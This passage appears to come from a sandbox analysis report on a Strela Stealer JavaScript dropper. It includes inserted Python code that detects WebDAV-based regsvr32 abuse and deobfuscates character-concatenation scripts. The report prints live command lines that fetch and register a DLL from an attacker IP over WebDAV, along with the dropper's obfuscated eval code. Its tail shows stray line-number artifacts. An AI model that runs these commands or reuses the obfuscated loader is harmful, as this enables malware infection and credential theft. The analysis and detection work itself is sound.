                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:5
                Start time:09:11:00
                Start date:17/12/2024
                Path:C:\Windows\System32\net.exe
                Wow64 process (32bit):false
                Commandline:net use \\193.143.1.231@8888\davwwwroot\
                Imagebase:0x7ff6f84a0000
                File size:59'904 bytes
                MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:10
                Start time:09:11:10
                Start date:17/12/2024
                Path:C:\Windows\System32\cmd.exe
                Wow64 process (32bit):false
                Commandline:cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll
                Imagebase:0x7ff63b0a0000
                File size:289'792 bytes
                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:11
                Start time:09:11:10
                Start date:17/12/2024
                Path:C:\Windows\System32\regsvr32.exe
                Wow64 process (32bit):false
                Commandline:regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll
                Imagebase:0x7ff7fa860000
                File size:25'088 bytes
                MD5 hash:B0C2FA35D14A9FAD919E99D9D75E1B9E
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_StrelaStealer, Description: Yara detected Strela Stealer, Source: 0000000B.00000002.2271164628.00007FF8B7E10000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                • Rule: JoeSecurity_StrelaStealer, Description: Yara detected Strela Stealer, Source: 0000000B.00000002.2270841882.00000000024B1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                Reputation:high
                Has exited:true
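The process list above records the whole delivery chain: wscript.exe runs the .js, which starts cmd.exe with `cmd /c net use \\193.143.1.231@8888\davwwwroot\ && cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll`, so the DLL is mounted through the WebClient service over WebDAV on port 8888 and registered by regsvr32 straight from the share, which is where the "Scripting/CommandLine Process Spawned Regsvr32", "WScript or CScript Dropper" and non-standard-port signatures come from. The following added example (not Joe Sandbox's code) turns that into detection logic over process-creation events: it parses the WebDAV redirector's UNC syntax (\\host@port\, \\host@SSL\, \\host@SSL@port\), flags regsvr32 loading a DLL from such a share, `net use` against a WebDAV share on a port other than 80/443, and a script host spawning a LOLBin. SAMPLE_EVENTS is constructed from the command lines above; the field names (`image`, `parent_image`, `command_line`) are not a real EDR schema, and the parent/child relationships are assumptions, since the process list does not print parents (they follow from the signatures in the overview).

```python
import ntpath
import re
from dataclasses import dataclass

# Windows WebDAV redirector UNC forms: \\host@port\..., \\host@SSL\..., \\host@SSL@port\...
WEBDAV_UNC_RE = re.compile(
    r"""\\\\(?P<host>[\w.\-]+)@(?P<spec>SSL@\d+|SSL|\d+)\\(?P<path>[^\s&|"']*)""", re.I
)
NET_USE_RE = re.compile(r"\bnet1?(?:\.exe)?\s+use\b", re.I)
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
LOLBINS = {"cmd.exe", "powershell.exe", "regsvr32.exe", "rundll32.exe", "mshta.exe"}


@dataclass(frozen=True)
class Finding:
    rule: str
    severity: str
    image: str
    host: str = ""
    port: int = 0
    path: str = ""
    note: str = ""


def parse_webdav_unc(text):
    """Every WebDAV UNC reference in text as (host, port, path).
    @SSL without an explicit port means 443; a bare \\\\server\\share is not WebDAV."""
    out = []
    for m in WEBDAV_UNC_RE.finditer(text):
        spec = m.group("spec").upper()
        if spec == "SSL":
            port = 443
        elif spec.startswith("SSL@"):
            port = int(spec[4:])
        else:
            port = int(spec)
        out.append((m.group("host"), port, m.group("path")))
    return out


def _basename(image_path):
    return ntpath.basename(image_path.strip('"')).lower()


def analyze(events):
    """Run the three rules over process-creation events (dicts with image,
    parent_image and command_line) and return the findings in event order."""
    findings = []
    for ev in events:
        image = _basename(ev["image"])
        parent = _basename(ev.get("parent_image", ""))
        cmd = ev["command_line"]
        if parent in SCRIPT_HOSTS and image in LOLBINS:
            findings.append(Finding("script_host_spawned_lolbin", "medium", image,
                                    note=f"parent={parent}"))
        for host, port, path in parse_webdav_unc(cmd):
            # Composite "cmd /c a && cmd /c b" lines carry both UNCs; key the
            # regsvr32 rule on the command text, not only on the image name.
            if "regsvr32" in cmd.lower() and path.lower().endswith(".dll"):
                findings.append(Finding("regsvr32_loads_dll_from_webdav", "high",
                                        image, host, port, path))
            elif NET_USE_RE.search(cmd) and port not in (80, 443):
                findings.append(Finding("net_use_webdav_nonstandard_port", "medium",
                                        image, host, port, path))
    return findings


# Constructed from the report's process list; parent images are assumptions.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe", "parent_image": r"C:\Windows\System32\wscript.exe",
     "command_line": r'"C:\Windows\System32\cmd.exe" /c cmd /c net use \\193.143.1.231@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll'},
    {"image": r"C:\Windows\System32\cmd.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd /c net use \\193.143.1.231@8888\davwwwroot" "\\"},
    {"image": r"C:\Windows\System32\net.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"net use \\193.143.1.231@8888\davwwwroot" "\\"},
    {"image": r"C:\Windows\System32\cmd.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd /c regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll"},
    {"image": r"C:\Windows\System32\regsvr32.exe", "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"regsvr32 /s \\193.143.1.231@8888\davwwwroot\140341625623863.dll"},
]
```

The `@port` form is what makes this chain cheap to spot: ordinary SMB UNC paths never carry a port, so any `\\host@<digits>\` in a command line is the WebDAV redirector, and a port other than 80 or 443 almost never appears in legitimate use.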

                Call Graph

                [Call graph: entry -> ftewq(); legend: executed / not executed]

                Script:

                Code
                function ftewq() {
                • ftewq() ➔ undefined
                this[hfgkhke + iqkshjqkp + conprmvk + mwncmi] ( gebyyu + eoztg + jqskgadc + jvaxx + xqqrniwzz + zxqbq + qtwic + cblmmvh + cblmmvh + iqkshjqkp + acrinokm + qtwic + gebyyu + conprmvk + djwmv + ktqhqp + djwmv + woscoo + acrinokm + gbeabu + cblmmvh + oindqeulx + zxqbq + jvaxx + ktqhqp + qxdyfx + jqskgadc + conprmvk + acrinokm + jvaxx + yptqmnxq + conprmvk + cblmmvh + zxqbq + djwmv + zxqbq + ofjnsbxia + acrinokm + oindqeulx + mclcpkxr + jvaxx + zsthedrh + hdgtouue + conprmvk + qtwic + ofjnsbxia + acrinokm + qtwic + oindqeulx + tqyfu + yptqmnxq + iqkshjqkp + acrinokm + hdgtouue + hfgkhke + ktqhqp + woscoo + woscoo + mcyra + slaxzev + xqqrniwzz + ktqhqp + jqskgadc + qxdyfx + mcyra + mclcpkxr + ofjnsbxia + conprmvk + cblmmvh + acrinokm + jvaxx + yptqmnxq + conprmvk + cblmmvh + zxqbq + djwmv + zxqbq + ofjnsbxia + acrinokm + eoztg + cblmmvh + hdgtouue + zsthedrh + eoztg + zsthedrh + hfgkhke + acrinokm + ofjnsbxia + gbeabu + zxqbq + djwmv + smafnpnc + yptqmnxq + iqkshjqkp + zsthedrh + acrinokm + hdgtouue + hfgkhke + ktqhqp + woscoo + woscoo + mcyra + acrinokm + eoztg + cblmmvh + hdgtouue + zsthedrh + eoztg + zsthedrh + hfgkhke + acrinokm + gbeabu + jvaxx + ktqhqp + woscoo + djwmv + zsthedrh + acrinokm + zsthedrh + gebyyu + mclcpkxr + eoztg + mclcpkxr + djwmv + acrinokm + gbeabu + jqskgadc + zxqbq + qtwic + mclcpkxr + hfgkhke + mcyra + mwncmi + qxdyfx + acrinokm + eoztg + cblmmvh + hdgtouue + zsthedrh + eoztg + zsthedrh + hfgkhke + acrinokm + gbeabu + cblmmvh + oindqeulx + zxqbq + jvaxx + ktqhqp + qxdyfx + jqskgadc + conprmvk + acrinokm + hdgtouue + hfgkhke + ktqhqp + woscoo + woscoo + mcyra + slaxzev + yzkeee + zxqbq + qtwic + cblmmvh + cblmmvh + iqkshjqkp + acrinokm + qtwic + gebyyu + conprmvk + djwmv + ktqhqp + djwmv + woscoo + acrinokm + gbeabu + cblmmvh + oindqeulx + zxqbq + jvaxx + ktqhqp + qxdyfx + jqskgadc + conprmvk + acrinokm + jvaxx + yptqmnxq + conprmvk + cblmmvh + zxqbq + djwmv + zxqbq + ofjnsbxia + acrinokm + oindqeulx + mclcpkxr + jvaxx + 
zsthedrh + hdgtouue + conprmvk + qtwic + ofjnsbxia + acrinokm + qtwic + oindqeulx + tqyfu + yptqmnxq + iqkshjqkp + acrinokm + hdgtouue + hfgkhke + ktqhqp + woscoo + woscoo + mcyra + acrinokm + yptqmnxq + mclcpkxr + jvaxx + ktqhqp + cblmmvh + acrinokm + qtwic + gebyyu + conprmvk + djwmv + ktqhqp + djwmv + woscoo + acrinokm + hfgkhke + gbeabu + ywkps + gebyyu + hdgtouue + acrinokm + eoztg + cblmmvh + hdgtouue + zsthedrh + eoztg + zsthedrh + hfgkhke + acrinokm + yptqmnxq + tqyfu + zxqbq + ofjnsbxia + yptqmnxq + jqskgadc + acrinokm + yptqmnxq + tqyfu + zxqbq + ofjnsbxia + yptqmnxq + jqskgadc + jrzvb + xqqrniwzz + jvaxx + yptqmnxq + conprmvk + cblmmvh + zxqbq + djwmv + zxqbq + ofjnsbxia + acrinokm + yptqmnxq + ofjnsbxia + woscoo + smafnpnc + conprmvk + acrinokm + ywkps + qxdyfx + mclcpkxr + ktqhqp + mclcpkxr + slaxzev + yzkeee + gbeabu + cblmmvh + oindqeulx + zxqbq + jvaxx + ktqhqp + qxdyfx + jqskgadc + conprmvk + acrinokm + woscoo + djwmv + gebyyu + mclcpkxr + yptqmnxq + zxqbq + qxdyfx + mclcpkxr + acrinokm + mclcpkxr + gebyyu + tqyfu + jqskgadc + ofjnsbxia + acrinokm + conprmvk + ofjnsbxia + smafnpnc + yptqmnxq + mwncmi + hfgkhke + hfgkhke + hfgkhke + yptqmnxq + acrinokm + eoztg + mcyra + iqkshjqkp + mclcpkxr + tqyfu + jqskgadc + smafnpnc + hfgkhke + acrinokm + gbeabu + cblmmvh + oindqeulx + zxqbq + jvaxx + ktqhqp + qxdyfx + jqskgadc + conprmvk + acrinokm + conprmvk + ofjnsbxia + smafnpnc + yptqmnxq + mwncmi + hfgkhke + hfgkhke + hfgkhke + yptqmnxq + acrinokm + gbeabu + cblmmvh + oindqeulx + zxqbq + jvaxx + ktqhqp + qxdyfx + jqskgadc + conprmvk + acrinokm + woscoo + djwmv + gebyyu + mclcpkxr + yptqmnxq + zxqbq + qxdyfx + mclcpkxr + acrinokm + mclcpkxr + gebyyu + tqyfu + jqskgadc + ofjnsbxia + acrinokm + conprmvk + ofjnsbxia + smafnpnc + yptqmnxq + mwncmi + hfgkhke + hfgkhke + hfgkhke + yptqmnxq + acrinokm + eoztg + mcyra + iqkshjqkp + mclcpkxr + tqyfu + jqskgadc + smafnpnc + hfgkhke + acrinokm + gbeabu + cblmmvh + oindqeulx + zxqbq + jvaxx + ktqhqp + qxdyfx + jqskgadc 
+ conprmvk + acrinokm + conprmvk + ofjnsbxia + smafnpnc + yptqmnxq + mwncmi + hfgkhke + hfgkhke + hfgkhke + yptqmnxq + acrinokm + ywkps + qxdyfx + mclcpkxr + ktqhqp + mclcpkxr + acrinokm + eoztg + cblmmvh + hdgtouue + zsthedrh + eoztg + zsthedrh + hfgkhke + acrinokm + hdgtouue + hfgkhke + ktqhqp + woscoo + woscoo + mcyra + acrinokm + conprmvk + ofjnsbxia + smafnpnc + yptqmnxq + mwncmi + hfgkhke + hfgkhke + hfgkhke + yptqmnxq + acrinokm + yptqmnxq + ofjnsbxia + woscoo + smafnpnc + conprmvk + acrinokm + oindqeulx + iqkshjqkp + conprmvk + qxdyfx + qxdyfx + acrinokm + eoztg + cblmmvh + hdgtouue + zsthedrh + eoztg + zsthedrh + hfgkhke + acrinokm + conprmvk + ofjnsbxia + smafnpnc + yptqmnxq + mwncmi + hfgkhke + hfgkhke + hfgkhke + yptqmnxq + acrinokm + ofjnsbxia + iqkshjqkp + djwmv + djwmv + mcyra + acrinokm + ofjnsbxia + iqkshjqkp + djwmv + djwmv + mcyra + acrinokm + conprmvk + cblmmvh + djwmv + oindqeulx + mwncmi + acrinokm + smafnpnc + ktqhqp + jqskgadc + woscoo + mwncmi + qxdyfx + acrinokm + qtwic + conprmvk + gbeabu + mcyra + ofjnsbxia + zxqbq + acrinokm + yptqmnxq + mclcpkxr + jvaxx + ktqhqp + cblmmvh + acrinokm + conprmvk + cblmmvh + djwmv + oindqeulx + mwncmi + acrinokm + iqkshjqkp + qtwic + mclcpkxr + tqyfu + oindqeulx + ywkps + gebyyu + zxqbq + gebyyu + acrinokm + qtwic + conprmvk + gbeabu + mcyra + ofjnsbxia + zxqbq + acrinokm + yptqmnxq + mclcpkxr + jvaxx + ktqhqp + cblmmvh + acrinokm + conprmvk + cblmmvh + djwmv + oindqeulx + mwncmi + acrinokm + yptqmnxq + mclcpkxr + jvaxx + ktqhqp + cblmmvh + acrinokm + jvaxx + jqskgadc + yptqmnxq + qxdyfx + oindqeulx + mcyra + yptqmnxq + acrinokm + qtwic + conprmvk + gbeabu + mcyra + ofjnsbxia + zxqbq + acrinokm + conprmvk + cblmmvh + djwmv + oindqeulx + mwncmi + acrinokm + zxqbq + jqskgadc + eoztg + ofjnsbxia + gbeabu + mclcpkxr + ktqhqp + acrinokm + qxdyfx + ofjnsbxia + qtwic + zxqbq + yptqmnxq + yptqmnxq + mcyra + hfgkhke + acrinokm + qxdyfx + ofjnsbxia + qtwic + zxqbq + yptqmnxq + yptqmnxq + mcyra + hfgkhke + acrinokm 
+ qxdyfx + ofjnsbxia + qtwic + zxqbq + yptqmnxq + yptqmnxq + mcyra + hfgkhke + acrinokm + qxdyfx + ofjnsbxia + qtwic + zxqbq + yptqmnxq + yptqmnxq + mcyra + hfgkhke + acrinokm + ofjnsbxia + iqkshjqkp + djwmv + djwmv + mcyra + acrinokm + mclcpkxr + gebyyu + tqyfu + jqskgadc + ofjnsbxia + acrinokm + ofjnsbxia + gbeabu + zxqbq + djwmv + smafnpnc + yptqmnxq + iqkshjqkp + zsthedrh + acrinokm + jqskgadc + mclcpkxr + zsthedrh + jvaxx + eoztg + oindqeulx + mclcpkxr + zsthedrh + djwmv + acrinokm + gebyyu + mclcpkxr + woscoo + cblmmvh + mcyra + acrinokm + gebyyu + mclcpkxr + woscoo + cblmmvh + mcyra + acrinokm + gebyyu + mclcpkxr + woscoo + cblmmvh + mcyra + acrinokm + jvaxx + yptqmnxq + conprmvk + cblmmvh + zxqbq + djwmv + zxqbq + ofjnsbxia + acrinokm + hdgtouue + ktqhqp + hfgkhke + conprmvk + ktqhqp + mcyra + acrinokm + hdgtouue + ktqhqp + hfgkhke + conprmvk + ktqhqp + mcyra + acrinokm + hdgtouue + hfgkhke + ktqhqp + woscoo + woscoo + mcyra + acrinokm + ofjnsbxia + iqkshjqkp + djwmv + djwmv + mcyra + acrinokm + mclcpkxr + gbeabu + iqkshjqkp + qxdyfx + jqskgadc + acrinokm + mclcpkxr + gbeabu + iqkshjqkp + qxdyfx + jqskgadc + acrinokm + gbeabu + cblmmvh + oindqeulx + zxqbq + jvaxx + ktqhqp + qxdyfx + jqskgadc + conprmvk + acrinokm + woscoo + djwmv + gebyyu + mclcpkxr + yptqmnxq + zxqbq + qxdyfx + mclcpkxr + acrinokm + mclcpkxr + gebyyu + tqyfu + jqskgadc + ofjnsbxia + acrinokm + conprmvk + ofjnsbxia + smafnpnc + yptqmnxq + mwncmi + hfgkhke + hfgkhke + hfgkhke + yptqmnxq + acrinokm + eoztg + mcyra + iqkshjqkp + mclcpkxr + tqyfu + jqskgadc + smafnpnc + hfgkhke + acrinokm + gbeabu + cblmmvh + oindqeulx + zxqbq + jvaxx + ktqhqp + qxdyfx + jqskgadc + conprmvk + acrinokm + conprmvk + ofjnsbxia + smafnpnc + yptqmnxq + mwncmi + hfgkhke + hfgkhke + hfgkhke + yptqmnxq + acrinokm + jvaxx + yptqmnxq + conprmvk + cblmmvh + zxqbq + djwmv + zxqbq + ofjnsbxia + acrinokm + eoztg + cblmmvh + hdgtouue + zsthedrh + eoztg + zsthedrh + hfgkhke + acrinokm + eoztg + qtwic + hdgtouue + gebyyu + 
gbeabu + mcyra + mcyra + hfgkhke + acrinokm + oindqeulx + iqkshjqkp + conprmvk + qxdyfx + qxdyfx + acrinokm + jqskgadc + mclcpkxr + zsthedrh + jvaxx + eoztg + oindqeulx + mclcpkxr + zsthedrh + djwmv + acrinokm + jvaxx + yptqmnxq + conprmvk + cblmmvh + zxqbq + djwmv + zxqbq + ofjnsbxia + acrinokm + qtwic + conprmvk + gbeabu + mcyra + ofjnsbxia + zxqbq + acrinokm + jvaxx + jqskgadc + yptqmnxq + qxdyfx + oindqeulx + mcyra + yptqmnxq + acrinokm + conprmvk + ofjnsbxia + smafnpnc + yptqmnxq + mwncmi + hfgkhke + hfgkhke + hfgkhke + yptqmnxq + acrinokm + eoztg + mcyra + iqkshjqkp + mclcpkxr + tqyfu + jqskgadc + smafnpnc + hfgkhke + acrinokm + oindqeulx + iqkshjqkp + conprmvk + qxdyfx + qxdyfx + acrinokm + conprmvk + ofjnsbxia + smafnpnc + yptqmnxq + mwncmi + hfgkhke + hfgkhke + hfgkhke + yptqmnxq + acrinokm + ofjnsbxia + iqkshjqkp + djwmv + djwmv + mcyra + acrinokm + ofjnsbxia + iqkshjqkp + djwmv + djwmv + mcyra + acrinokm + conprmvk + cblmmvh + djwmv + oindqeulx + mwncmi + acrinokm + smafnpnc + ktqhqp + jqskgadc + woscoo + mwncmi + qxdyfx + acrinokm + qtwic + conprmvk + gbeabu + mcyra + ofjnsbxia + zxqbq + acrinokm + yptqmnxq + mclcpkxr + jvaxx + ktqhqp + cblmmvh + acrinokm + conprmvk + cblmmvh + djwmv + oindqeulx + mwncmi + acrinokm + iqkshjqkp + qtwic + mclcpkxr + tqyfu + oindqeulx + ywkps + gebyyu + zxqbq + gebyyu + acrinokm + qtwic + conprmvk + gbeabu + mcyra + ofjnsbxia + zxqbq + acrinokm + yptqmnxq + mclcpkxr + jvaxx + ktqhqp + cblmmvh + acrinokm + conprmvk + cblmmvh + djwmv + oindqeulx + mwncmi + acrinokm + yptqmnxq + mclcpkxr + jvaxx + ktqhqp + cblmmvh + acrinokm + jvaxx + jqskgadc + yptqmnxq + qxdyfx + oindqeulx + mcyra + yptqmnxq + acrinokm + qtwic + conprmvk + gbeabu + mcyra + ofjnsbxia + zxqbq + acrinokm + conprmvk + cblmmvh + djwmv + oindqeulx + mwncmi + acrinokm + zxqbq + jqskgadc + eoztg + ofjnsbxia + gbeabu + mclcpkxr + ktqhqp + acrinokm + qxdyfx + ofjnsbxia + qtwic + zxqbq + yptqmnxq + yptqmnxq + mcyra + hfgkhke + acrinokm + qxdyfx + ofjnsbxia + qtwic + 
zxqbq + yptqmnxq + yptqmnxq + mcyra + hfgkhke + acrinokm + qxdyfx + ofjnsbxia + qtwic + zxqbq + yptqmnxq + yptqmnxq + mcyra + hfgkhke + acrinokm + qxdyfx + ofjnsbxia + qtwic + zxqbq + yptqmnxq + yptqmnxq + mcyra + hfgkhke + acrinokm + ofjnsbxia + iqkshjqkp + djwmv + djwmv + mcyra + acrinokm + mclcpkxr + gebyyu + tqyfu + jqskgadc + ofjnsbxia + acrinokm + ofjnsbxia + gbeabu + zxqbq + djwmv + smafnpnc + yptqmnxq + iqkshjqkp + zsthedrh + acrinokm + jqskgadc + mclcpkxr + zsthedrh + jvaxx + eoztg + oindqeulx + mclcpkxr + zsthedrh + djwmv + acrinokm + gebyyu + mclcpkxr + woscoo + cblmmvh + mcyra + acrinokm + gebyyu + mclcpkxr + woscoo + cblmmvh + mcyra + acrinokm + gebyyu + mclcpkxr + woscoo + cblmmvh + mcyra + acrinokm + jvaxx + yptqmnxq + conprmvk + cblmmvh + zxqbq + djwmv + zxqbq + ofjnsbxia + acrinokm + hdgtouue + ktqhqp + hfgkhke + conprmvk + ktqhqp + mcyra + acrinokm + hdgtouue + ktqhqp + hfgkhke + conprmvk + ktqhqp + mcyra + acrinokm + hdgtouue + hfgkhke + ktqhqp + woscoo + woscoo + mcyra + acrinokm + ofjnsbxia + iqkshjqkp + djwmv + djwmv + mcyra + acrinokm + conprmvk + cblmmvh + djwmv + oindqeulx + mwncmi + acrinokm + iqkshjqkp + qtwic + mclcpkxr + tqyfu + oindqeulx + ywkps + gebyyu + zxqbq + gebyyu + acrinokm + mwncmi + gebyyu + ofjnsbxia + gebyyu + hdgtouue + acrinokm + qtwic + conprmvk + gbeabu + mcyra + ofjnsbxia + zxqbq + acrinokm + iqkshjqkp + qtwic + mclcpkxr + tqyfu + oindqeulx + ywkps + gebyyu + zxqbq + gebyyu + acrinokm + conprmvk + cblmmvh + djwmv + oindqeulx + mwncmi + acrinokm + eoztg + iqkshjqkp + qxdyfx + gbeabu + smafnpnc + mclcpkxr + tqyfu + mclcpkxr + jqskgadc + acrinokm + jvaxx + jqskgadc + yptqmnxq + qxdyfx + oindqeulx + mcyra + yptqmnxq + acrinokm + yptqmnxq + ktqhqp + qtwic + zxqbq + gbeabu + cblmmvh + ofjnsbxia + ywkps + hfgkhke + acrinokm + eoztg + iqkshjqkp + qxdyfx + gbeabu + smafnpnc + mclcpkxr + tqyfu + mclcpkxr + jqskgadc + acrinokm + jvaxx + jqskgadc + yptqmnxq + qxdyfx + oindqeulx + mcyra + yptqmnxq + acrinokm + qtwic + conprmvk + 
gbeabu + mcyra + ofjnsbxia + zxqbq + acrinokm + qxdyfx + ofjnsbxia + qtwic + zxqbq + yptqmnxq + yptqmnxq + mcyra + hfgkhke + acrinokm + eoztg + iqkshjqkp + qxdyfx + gbeabu + smafnpnc + mclcpkxr + tqyfu + mclcpkxr + jqskgadc + acrinokm + qtwic + conprmvk + gbeabu + mcyra + ofjnsbxia + zxqbq + acrinokm + yptqmnxq + mclcpkxr + jvaxx + ktqhqp + cblmmvh + acrinokm + mclcpkxr + gebyyu + tqyfu + jqskgadc + ofjnsbxia + acrinokm + yptqmnxq + tqyfu + zxqbq + ofjnsbxia + yptqmnxq + jqskgadc + acrinokm + yptqmnxq + tqyfu + zxqbq + ofjnsbxia + yptqmnxq + jqskgadc + jxhwrfv + ltctg + jxhwrfv + cblmmvh + conprmvk + mwncmi + jvaxx + hfgkhke + jrzvb + nbgxvy );
                • eval("this[ndffv+dtapbpy+ofjnsbxia+smafnpnc+jqskgadc+djwmv+gebyyu][bixuqcaf+smafnpnc+hfgkhke+conprmvk+gebyyu+hfgkhke+osbypk+ktqhqp+oindqeulx+hfgkhke+ofjnsbxia+gebyyu](ndffv+dtapbpy+ofjnsbxia+smafnpnc+jqskgadc+djwmv+gebyyu+mqsbf+dtapbpy+eoztg+hfgkhke+mwncmi+mwncmi)[smafnpnc+mcyra+zxqbq](ofjnsbxia+yptqmnxq+qtwic+acrmleeem+huvqwire+ofjnsbxia+acrmleeem+ofjnsbxia+yptqmnxq+qtwic+acrmleeem+huvqwire+ofjnsbxia+acrmleeem+zxqbq+hfgkhke+gebyyu+acrmleeem+mcyra+jvaxx+hfgkhke+acrmleeem+cvppu+cvppu+afpjl+rbiylx+daoucn+mqsbf+afpjl+vdqwjztnt+daoucn+mqsbf+afpjl+mqsbf+simxjum+daoucn+afpjl+nihcoqb+xcdnmmue+xcdnmmue+xcdnmmue+xcdnmmue+cvppu+qtwic+conprmvk+iqkshjqkp+tqyfu+tqyfu+tqyfu+smafnpnc+gbeabu+gbeabu+gebyyu+cvppu+qovxi+qovxi+ofjnsbxia+yptqmnxq+qtwic+acrmleeem+huvqwire+ofjnsbxia+acrmleeem+smafnpnc+hfgkhke+hdgtouue+jvaxx+iqkshjqkp+smafnpnc+daoucn+simxjum+acrmleeem+huvqwire+jvaxx+acrmleeem+cvppu+cvppu+afpjl+rbiylx+daoucn+mqsbf+afpjl+vdqwjztnt+daoucn+mqsbf+afpjl+mqsbf+simxjum+daoucn+afpjl+nihcoqb+xcdnmmue+xcdnmmue+xcdnmmue+xcdnmmue+cvppu+qtwic+conprmvk+iqkshjqkp+tqyfu+tqyfu+tqyfu+smafnpnc+gbeabu+gbeabu+gebyyu+cvppu+afpjl+vdqwjztnt+ltctg+daoucn+vdqwjztnt+afpjl+hvxorqwqi+simxjum+mbdnofcze+hvxorqwqi+simxjum+daoucn+xcdnmmue+hvxorqwqi+daoucn+mqsbf+qtwic+mwncmi+mwncmi,0,false);") ➔ 0
                }
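The function above is the entire logic of the dropper: every string is built by concatenating one-character globals, which the remainder of the listing assigns, often several times, with only the last write live when ftewq() runs (ktqhqp is set to "F" and then "b", afpjl to "x", "Y", "r" and finally "1"). The outer chain on `this` is four identifiers long, and the argument chain spells out a second script, which the trace line shows being passed to eval(); that inner script carries its own chains of 7, 12, 13 and 3 identifiers, a long argument, and a literal `,0,false`. The following added example (not Joe Sandbox's code and not the sample's) resolves this pattern: it records the final value of each variable, folds every chain into the literal it spells, then repeats the step on any string literal that still contains chains, which peels the eval layer. Because only part of the real character table appears on this page, the example builds its own sample in the same style, with a constructed command line and an RFC 5737 documentation address; the inner names it uses (WScript, CreateObject, WScript.Shell, run) are an assumption that is consistent with the chain lengths and the cmd.exe command line in the process list, not a decoded result.

```python
import random
import re
import string

IDENT = r"[A-Za-z_$][\w$]*"
ASSIGN_RE = re.compile(rf'^\s*({IDENT})\s*=\s*"((?:[^"\\]|\\.)*)"\s*;\s*$')
CHAIN_RE = re.compile(rf"{IDENT}(?:\s*\+\s*{IDENT})+")
STRING_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')

# Constructed stand-in for the real command line (RFC 5737 address, made-up DLL name).
SAMPLE_COMMAND = (r"cmd /c net use \\203.0.113.5@8888\davwwwroot\&&"
                  r"cmd /c regsvr32 /s \\203.0.113.5@8888\davwwwroot\sample.dll")


def js_unescape(s):
    return re.sub(r"\\(.)", r"\1", s)


def js_quote(s):
    return '"' + s.replace("\\", "\\\\").replace('"', '\\"') + '"'


def final_values(script):
    """Final value of every variable assigned a string literal. The script
    overwrites names repeatedly; only the last write is live when ftewq() runs."""
    values = {}
    for line in script.splitlines():
        m = ASSIGN_RE.match(line)
        if m:
            values[m.group(1)] = js_unescape(m.group(2))
    return values


def fold_chains(text, values):
    """Replace each `a + b + c` chain whose names all resolve with the literal it spells."""
    def repl(m):
        names = [n.strip() for n in m.group(0).split("+")]
        if all(n in values for n in names):
            return js_quote("".join(values[n] for n in names))
        return m.group(0)  # leave chains with unknown names untouched
    return CHAIN_RE.sub(repl, text)


def string_literals(text):
    return [js_unescape(m.group(1)) for m in STRING_RE.finditer(text)]


def deobfuscate(script, max_layers=8):
    """Layer 0 is the script with its character table folded in. Each further
    layer is a string literal of the previous layer that itself contained
    resolvable chains, i.e. source text that was handed to eval()."""
    values = final_values(script)
    body = "\n".join(l for l in script.splitlines() if not ASSIGN_RE.match(l))
    layers = [fold_chains(body, values)]
    while len(layers) < max_layers:
        folded = [(s, fold_chains(s, values)) for s in string_literals(layers[-1])]
        inner = next((f for s, f in folded if f != s), None)
        if inner is None:
            break
        layers.append(inner)
    return layers


def build_sample(seed=7):
    """Constructed sample in the style of the listing above, not the real dropper:
    one global per distinct character, decoy writes before the live one, an outer
    chain spelling the eval() payload and inner chains inside that payload."""
    rng = random.Random(seed)
    names = {}

    def var(ch):
        while ch not in names:
            cand = "".join(rng.choice(string.ascii_lowercase) for _ in range(rng.randint(5, 9)))
            if cand not in names.values():
                names[ch] = cand
        return names[ch]

    def chain(text):
        return " + ".join(var(c) for c in text)

    inner = ("this[" + chain("WScript") + "][" + chain("CreateObject") + "]("
             + chain("WScript.Shell") + ")[" + chain("run") + "]("
             + chain(SAMPLE_COMMAND) + ",0,false);")
    call = "this[" + chain("eval") + "](" + chain(inner) + ");"
    table = []
    for ch, name in names.items():
        for _ in range(rng.randint(0, 2)):  # decoys, discarded by last-write-wins
            table.append(f"{name} = {js_quote(rng.choice(string.ascii_letters + string.digits))};")
        table.append(f"{name} = {js_quote(ch)};")
    return "function ftewq() {\n    " + call + "\n}\n" + "\n".join(table) + "\nftewq();\n"
```

Folding is purely textual, so it never executes the script; the trade-off is that a chain referencing a name that is computed rather than assigned a literal stays unresolved, which the output makes visible rather than hiding.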
                ktqhqp = "F";
                ktqhqp = "b";
                afpjl = "x";
                afpjl = "Y";
                afpjl = "r";
                afpjl = "1";
                nihcoqb = "@";
                hvxorqwqi = "i";
                hvxorqwqi = "G";
                hvxorqwqi = "p";
                hvxorqwqi = "z";
                hvxorqwqi = "6";
                xqqrniwzz = "A";
                xqqrniwzz = "[";
                conprmvk = "a";
                daoucn = "3";
                slaxzev = "]";
                tqyfu = "l";
                tqyfu = "x";
                tqyfu = "w";
                qxdyfx = "x";
                vdqwjztnt = "4";
                djwmv = "y";
                djwmv = "P";
                djwmv = "p";
                nbgxvy = ";";
                cblmmvh = "i";
                cblmmvh = "i";
                                                                          31
                                                                          cblmmvh = "w";
                                                                            32
                                                                            cblmmvh = "f";
                                                                              33
                                                                              jrzvb = ")";
                                                                                34
                                                                                zxqbq = "n";
                                                                                  35
                                                                                  ywkps = "f";
                                                                                    36
                                                                                    ywkps = "z";
                                                                                      37
                                                                                      ndffv = "P";
                                                                                        38
                                                                                        ndffv = "j";
                                                                                          39
                                                                                          ndffv = "W";
                                                                                            40
